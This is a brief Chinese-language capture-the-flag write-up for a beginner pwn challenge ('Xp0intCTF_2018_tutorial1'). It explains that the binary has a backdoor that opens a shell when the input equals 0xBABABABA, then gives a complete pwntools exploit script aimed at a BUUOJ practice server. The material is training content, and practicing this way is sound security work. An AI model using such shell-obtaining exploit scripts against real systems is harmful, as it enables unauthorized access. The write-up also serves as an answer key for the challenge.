查看保护
用IDA打开查看程序流程
有后门函数backdoor,可以直接获得shell
程序逻辑很简单,输入buf使得buf==0xBABABABA即可获得shell
那么直接可以构造payload
完整ex
from pwn import *
context(log_level='debug')
#io=process("./Xp0intCTF_2018_tutorial1")
io=remote("node3.buuoj.cn",25721)
io.recv()
buf=0xBABABABA
io.sendline(p64(buf))
io.recv()
io.interactive()